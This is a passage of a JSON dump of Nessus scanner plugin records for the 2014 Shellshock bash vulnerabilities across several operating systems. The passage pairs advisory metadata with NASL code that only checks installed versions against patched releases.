value:\"http://www.nessus.org/u?f7d56c5e\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected bash, bash-debuginfo and / or bash-doc packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n 
script_set_attribute(attribute:\"metasploit_name\", value:'Apache mod_cgi Bash Environment Variable Code Injection (Shellshock)');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2014/09/24\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/09/26\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/09/29\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:bash\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:bash-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:bash-doc\");\n script_set_attribute(attribute:\"cpe\", value:\"x-cpe:/o:fermilab:scientific_linux\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Scientific Linux Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2014-2022 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Scientific Linux \" >!< release) audit(AUDIT_HOST_NOT, \"running Scientific Linux\");\nos_ver = pregmatch(pattern: \"Scientific Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Scientific Linux\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^6([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Scientific Linux 6.x\", \"Scientific Linux \" + os_ver);\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu >!< \"x86_64\" && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Scientific Linux\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"SL5\", reference:\"bash-3.2-33.el5_11.4\")) flag++;\nif (rpm_check(release:\"SL5\", reference:\"bash-debuginfo-3.2-33.el5_11.4\")) flag++;\n\nif (rpm_check(release:\"SL6\", reference:\"bash-4.1.2-15.el6_5.2\")) flag++;\nif (rpm_check(release:\"SL6\", reference:\"bash-debuginfo-4.1.2-15.el6_5.2\")) flag++;\nif (rpm_check(release:\"SL6\", reference:\"bash-doc-4.1.2-15.el6_5.2\")) flag++;\n\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"bash / bash-debuginfo / bash-doc\");\n}\n", "cvss": {"score": 10, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": 
"2022-05-04T23:57:47", "description": "The remote host is running a version of Palo Alto Networks PAN-OS prior to 5.0.15 / 5.1.10 / 6.0.6 / 6.1.1. It is, therefore, affected by a command injection vulnerability in GNU Bash known as Shellshock, which is due to the processing of trailing strings after function definitions in the values of environment variables. This allows a remote attacker to execute arbitrary code via environment variable manipulation depending on the configuration of the system.", "cvss3": {"score": null, "vector": null}, "published": "2014-10-20T00:00:00", "type": "nessus", "title": "Palo Alto Networks PAN-OS < 5.0.15 / 5.1.x < 5.1.10 / 6.0.x < 6.0.6 / 6.1.x < 6.1.1 Bash Shell Remote Code Execution (Shellshock)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-6271", "CVE-2014-7169"], "modified": "2022-01-31T00:00:00", "cpe": ["cpe:/o:paloaltonetworks:pan-os"], "id": "PALO_ALTO_PAN-SA-2014-0004.NASL", "href": "https://www.tenable.com/plugins/nessus/78587", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(78587);\n script_version(\"1.13\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/01/31\");\n\n script_cve_id(\"CVE-2014-6271\", \"CVE-2014-7169\");\n script_bugtraq_id(70103, 70137);\n script_xref(name:\"CERT\", value:\"252743\");\n script_xref(name:\"IAVA\", value:\"2014-A-0142\");\n script_xref(name:\"EDB-ID\", value:\"34765\");\n script_xref(name:\"EDB-ID\", value:\"34766\");\n script_xref(name:\"EDB-ID\", value:\"34777\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/07/28\");\n\n script_name(english:\"Palo Alto Networks PAN-OS < 5.0.15 / 5.1.x < 5.1.10 / 6.0.x < 6.0.6 / 6.1.x < 6.1.1 Bash Shell Remote Code Execution (Shellshock)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote host is affected by a remote code execution vulnerability.\");\n script_set_attribute(attribute:\"description\", 
value:\n\"The remote host is running a version of Palo Alto Networks PAN-OS\nprior to 5.0.15 / 5.1.10 / 6.0.6 / 6.1.1. It is, therefore, affected\nby a command injection vulnerability in GNU Bash known as Shellshock,\nwhich is due to the processing of trailing strings after function\ndefinitions in the values of environment variables. This allows a\nremote attacker to execute arbitrary code via environment variable\nmanipulation depending on the configuration of the system.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://securityadvisories.paloaltonetworks.com/Home/Detail/24\");\n script_set_attribute(attribute:\"see_also\", value:\"http://seclists.org/oss-sec/2014/q3/650\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.invisiblethreat.ca/post/shellshock/\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to PAN-OS version 5.0.15 / 5.1.10 / 6.0.6 / 6.1.1 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2014-7169\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Qmail SMTP Bash Environment Variable Injection (Shellshock)');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2014/09/24\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/09/25\");\n script_set_attribute(attribute:\"plugin_publication_date\", 
value:\"2014/10/20\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"combined\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:paloaltonetworks:pan-os\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Palo Alto Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2014-2022 Tenable Network Security, Inc.\");\n\n script_dependencies(\"palo_alto_version.nbin\");\n script_require_keys(\"Host/Palo_Alto/Firewall/Version\", \"Host/Palo_Alto/Firewall/Full_Version\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\n\napp_name = \"Palo Alto Networks PAN-OS\";\nversion = get_kb_item_or_exit(\"Host/Palo_Alto/Firewall/Version\");\nfull_version = get_kb_item_or_exit(\"Host/Palo_Alto/Firewall/Full_Version\");\nfix = NULL;\n\n# Ensure sufficient granularity.\nif (version !~ \"^\\d+\\.\\d+\") audit(AUDIT_VER_NOT_GRANULAR, app_name, full_version);\n\nif (version =~ \"^6\\.1($|[^0-9])\")\n fix = \"6.1.1\";\nelse if (version =~ \"^6\\.0($|[^0-9])\")\n fix = \"6.0.6\";\nelse if (version =~ \"^5\\.1($|[^0-9])\")\n fix = \"5.1.10\";\nelse\n fix = \"5.0.15\";\n\n# Compare version to fix and report as needed.\nif (ver_compare(ver:version, fix:fix, strict:FALSE) == -1)\n{\n if (report_verbosity > 0)\n {\n report =\n '\\n Installed version : ' + full_version +\n '\\n Fixed versions : ' + fix +\n '\\n';\n security_hole(extra:report, port:0);\n }\n else security_hole(0);\n\n exit(0);\n}\nelse audit(AUDIT_INST_VER_NOT_VULN, app_name, full_version);\n", "cvss": {"score": 10, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-05-04T23:56:51", "description": "Fix for CVE-2014-7169\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Fedora security advisory. 
Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {"score": null, "vector": null}, "published": "2014-09-29T00:00:00", "type": "nessus", "title": "Fedora 21 : bash-4.3.25-2.fc21 (2014-11718) (Shellshock)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-6271", "CVE-2014-7169"], "modified": "2022-01-31T00:00:00", "cpe": ["p-cpe:/a:fedoraproject:fedora:bash", "cpe:/o:fedoraproject:fedora:21"], "id": "FEDORA_2014-11718.NASL", "href": "https://www.tenable.com/plugins/nessus/77945", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory 2014-11718.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(77945);\n script_version(\"1.23\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/01/31\");\n\n script_cve_id(\"CVE-2014-6271\", \"CVE-2014-7169\");\n script_bugtraq_id(70103, 70137);\n script_xref(name:\"FEDORA\", value:\"2014-11718\");\n script_xref(name:\"IAVA\", value:\"2014-A-0142\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/07/28\");\n\n script_name(english:\"Fedora 21 : bash-4.3.25-2.fc21 (2014-11718) (Shellshock)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Fedora host is missing a security update.\");\n script_set_attribute(attribute:\"description\", value:\n\"Fix for CVE-2014-7169\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. 
Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.redhat.com/show_bug.cgi?id=1146319\");\n # https://lists.fedoraproject.org/pipermail/package-announce/2014-September/139129.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?625e21b5\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected bash package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Apache mod_cgi Bash Environment Variable Code Injection (Shellshock)');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/09/27\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/09/29\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:bash\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:21\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Fedora Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2014-2022 Tenable Network Security, Inc.\");\n\n 
script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = eregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^21([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 21.x\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"FC21\", reference:\"bash-4.3.25-2.fc21\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"bash\");\n}\n", "cvss": {"score": 10, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-04-28T14:53:46", "description": "Vulnerability in the Solaris component of Oracle Sun Systems Products Suite (subcomponent: Bash). The supported version that is affected is 10. Easily exploitable vulnerability allows low privileged attacker with logon to the infrastructure where Solaris executes to compromise Solaris. Successful attacks require human interaction from a person other than the attacker. 
Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of Solaris accessible data.\n\nThis plugin has been deprecated and either replaced with individual 126547 patch-revision plugins, or deemed non-security related.", "cvss3": {"score": 2.8, "vector": "CVSS:3.0/AV:L/AC:L/PR:L/UI:R/S:U/C:N/I:L/A:N"}, "published": "2012-09-17T00:00:00", "type": "nessus", "title": "Solaris 10 (x86) : 126547-10 (deprecated)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-6271", "CVE-2014-7169", "CVE-2016-5480"], "modified": "2021-01-14T00:00:00", "cpe": ["cpe:/o:sun:solaris"], "id": "SOLARIS10_X86_126547.NASL", "href": "https://www.tenable.com/plugins/nessus/62115", "sourceData": "#%NASL_MIN_LEVEL 70300\n\n#\n# (C) Tenable Network Security, Inc.\n#\n# @DEPRECATED@\n#\n# Disabled on 2018/03/12. Deprecated and either replaced by\n# individual patch-revision plugins, or has been deemed a\n# non-security advisory.\n#\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(62115);\n script_version(\"1.29\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2014-6271\", \"CVE-2014-7169\", \"CVE-2016-5480\");\n script_bugtraq_id(70103, 70137);\n script_xref(name:\"CERT\", value:\"252743\");\n script_xref(name:\"IAVA\", value:\"2014-A-0142\");\n script_xref(name:\"EDB-ID\", value:\"34765\");\n script_xref(name:\"EDB-ID\", value:\"34766\");\n script_xref(name:\"EDB-ID\", value:\"34777\");\n\n script_name(english:\"Solaris 10 (x86) : 126547-10 (deprecated)\");\n script_summary(english:\"Check for patch 126547-10\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"This plugin has been deprecated.\"\n );\n script_set_attribute(\n attribute:\"description\",\n value:\n\"Vulnerability in the Solaris component of Oracle Sun Systems Products\nSuite (subcomponent: Bash). The supported version that is affected is\n10. 
Easily exploitable vulnerability allows low privileged attacker\nwith logon to the infrastructure where Solaris executes to compromise\nSolaris. Successful attacks require human interaction from a person\nother than the attacker. Successful attacks of this vulnerability can\nresult in unauthorized update, insert or delete access to some of\nSolaris accessible data.\n\nThis plugin has been deprecated and either replaced with individual\n126547 patch-revision plugins, or deemed non-security related.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://getupdates.oracle.com/readme/126547-10\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"n/a\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:L/UI:R/S:U/C:N/I:L/A:N\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Apache mod_cgi Bash Environment Variable Code Injection (Shellshock)');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:sun:solaris\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/08/11\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2012/09/17\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is 
Copyright (C) 2012-2021 Tenable Network Security, Inc.\");\n script_family(english:\"Solaris Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Solaris/showrev\");\n\n exit(0);\n}\n\nexit(0, \"This plugin has been deprecated. Consult specific patch-revision plugins for patch 126547 instead.\");\n", "cvss": {"score": 10, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-04-28T14:53:30", "description": "Vulnerability in the Solaris component of Oracle Sun Systems Products Suite (subcomponent: Bash). The supported version that is affected is 10. Easily exploitable vulnerability allows low privileged attacker with logon to the infrastructure where Solaris executes to compromise Solaris. Successful attacks require human interaction from a person other than the attacker. Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of Solaris accessible data.\n\nThis plugin has been deprecated and either replaced with individual 126546 patch-revision plugins, or deemed non-security related.", "cvss3": {"score": 2.8, "vector": "CVSS:3.0/AV:L/AC:L/PR:L/UI:R/S:U/C:N/I:L/A:N"}, "published": "2012-09-26T00:00:00", "type": "nessus", "title": "Solaris 10 (sparc) : 126546-10 (deprecated)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-6271", "CVE-2014-7169", "CVE-2016-5480"], "modified": "2021-01-14T00:00:00", "cpe": ["cpe:/o:sun:solaris"], "id": "SOLARIS10_126546.NASL", "href": "https://www.tenable.com/plugins/nessus/62305", "sourceData": "#%NASL_MIN_LEVEL 70300\n\n#\n# (C) Tenable Network Security, Inc.\n#\n# @DEPRECATED@\n#\n# Disabled on 2018/03/12. 
Deprecated and either replaced by\n# individual patch-revision plugins, or has been deemed a\n# non-security advisory.\n#\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(62305);\n script_version(\"1.29\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2014-6271\", \"CVE-2014-7169\", \"CVE-2016-5480\");\n script_bugtraq_id(70103, 70137);\n script_xref(name:\"CERT\", value:\"252743\");\n script_xref(name:\"IAVA\", value:\"2014-A-0142\");\n script_xref(name:\"EDB-ID\", value:\"34765\");\n script_xref(name:\"EDB-ID\", value:\"34766\");\n script_xref(name:\"EDB-ID\", value:\"34777\");\n\n script_name(english:\"Solaris 10 (sparc) : 126546-10 (deprecated)\");\n script_summary(english:\"Check for patch 126546-10\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"This plugin has been deprecated.\"\n );\n script_set_attribute(\n attribute:\"description\",\n value:\n\"Vulnerability in the Solaris component of Oracle Sun Systems Products\nSuite (subcomponent: Bash). The supported version that is affected is\n10. Easily exploitable vulnerability allows low privileged attacker\nwith logon to the infrastructure where Solaris executes to compromise\nSolaris. Successful attacks require human interaction from a person\nother than the attacker. 
Successful attacks of this vulnerability can\nresult in unauthorized update, insert or delete access to some of\nSolaris accessible data.\n\nThis plugin has been deprecated and either replaced with individual\n126546 patch-revision plugins, or deemed non-security related.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://getupdates.oracle.com/readme/126546-10\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"n/a\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:L/UI:R/S:U/C:N/I:L/A:N\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Apache mod_cgi Bash Environment Variable Code Injection (Shellshock)');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:sun:solaris\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/08/11\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2012/09/26\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2012-2021 Tenable Network Security, Inc.\");\n script_family(english:\"Solaris Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", 
\"Host/Solaris/showrev\");\n\n exit(0);\n}\n\nexit(0, \"This plugin has been deprecated. Consult specific patch-revision plugins for patch 126546 instead.\");\n", "cvss": {"score": 10, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-05-04T23:57:22", "description": "The remote host is running a version of Mac OS X 10.8 or 10.9 that does not have Security Update 2014-005 applied. This update contains several security-related fixes for the following issues :\n\n - A command injection vulnerability in GNU Bash known as Shellshock. The vulnerability is due to the processing of trailing strings after function definitions in the values of environment variables. This allows a remote attacker to execute arbitrary code via environment variable manipulation depending on the configuration of the system. (CVE-2014-6271, CVE-2014-7169)\n\n - A man-in-the-middle (MitM) information disclosure vulnerability known as POODLE. The vulnerability is due to the way SSL 3.0 handles padding bytes when decrypting messages encrypted using block ciphers in cipher block chaining (CBC) mode. A MitM attacker can decrypt a selected byte of a cipher text in as few as 256 tries if they are able to force a victim application to repeatedly send the same data over newly created SSL 3.0 connections. 
(CVE-2014-3566)\n\nNote that successful exploitation of the most serious issues can result in arbitrary code execution.", "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2014-10-17T00:00:00", "type": "nessus", "title": "Mac OS X Multiple Vulnerabilities (Security Update 2014-005) (POODLE) (Shellshock)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-3566", "CVE-2014-6271", "CVE-2014-7169"], "modified": "2022-01-31T00:00:00", "cpe": ["cpe:/o:apple:mac_os_x"], "id": "MACOSX_SECUPD2014-005.NASL", "href": "https://www.tenable.com/plugins/nessus/78551", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(78551);\n script_version(\"1.25\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/01/31\");\n\n script_cve_id(\"CVE-2014-3566\", \"CVE-2014-6271\", \"CVE-2014-7169\");\n script_bugtraq_id(70103, 70137, 70574);\n script_xref(name:\"CERT\", value:\"252743\");\n script_xref(name:\"CERT\", value:\"577193\");\n script_xref(name:\"IAVA\", value:\"2014-A-0142\");\n script_xref(name:\"EDB-ID\", value:\"34765\");\n script_xref(name:\"EDB-ID\", value:\"34766\");\n script_xref(name:\"EDB-ID\", value:\"34777\");\n script_xref(name:\"APPLE-SA\", value:\"APPLE-SA-2014-10-16-2\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/07/28\");\n\n script_name(english:\"Mac OS X Multiple Vulnerabilities (Security Update 2014-005) (POODLE) (Shellshock)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote host is missing a Mac OS X update that fixes multiple\nsecurity issues.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote host is running a version of Mac OS X 10.8 or 10.9 that\ndoes not have Security Update 2014-005 applied. 
This update contains\nseveral security-related fixes for the following issues :\n\n - A command injection vulnerability in GNU Bash known as\n Shellshock. The vulnerability is due to the processing\n of trailing strings after function definitions in the\n values of environment variables. This allows a remote\n attacker to execute arbitrary code via environment\n variable manipulation depending on the configuration of\n the system. (CVE-2014-6271, CVE-2014-7169)\n\n - A man-in-the-middle (MitM) information disclosure\n vulnerability known as POODLE. The vulnerability is due\n to the way SSL 3.0 handles padding bytes when decrypting\n messages encrypted using block ciphers in cipher block\n chaining (CBC) mode. A MitM attacker can decrypt a\n selected byte of a cipher text in as few as 256 tries if\n they are able to force a victim application to\n repeatedly send the same data over newly created SSL 3.0\n connections. (CVE-2014-3566)\n\nNote that successful exploitation of the most serious issues can\nresult in arbitrary code execution.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.apple.com/en-us/HT203107\");\n script_set_attribute(attribute:\"see_also\", value:\"http://www.securityfocus.com/archive/1/533721/30/0/threaded\");\n script_set_attribute(attribute:\"see_also\", value:\"http://seclists.org/oss-sec/2014/q3/650\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.invisiblethreat.ca/post/shellshock/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.imperialviolet.org/2014/10/14/poodle.html\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.openssl.org/~bodo/ssl-poodle.pdf\");\n script_set_attribute(attribute:\"see_also\", value:\"https://tools.ietf.org/html/draft-ietf-tls-downgrade-scsv-00\");\n script_set_attribute(attribute:\"solution\", value:\n\"Install Security Update 2014-005 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n 
script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2014-7169\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Qmail SMTP Bash Environment Variable Injection (Shellshock)');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2014/09/24\");\n 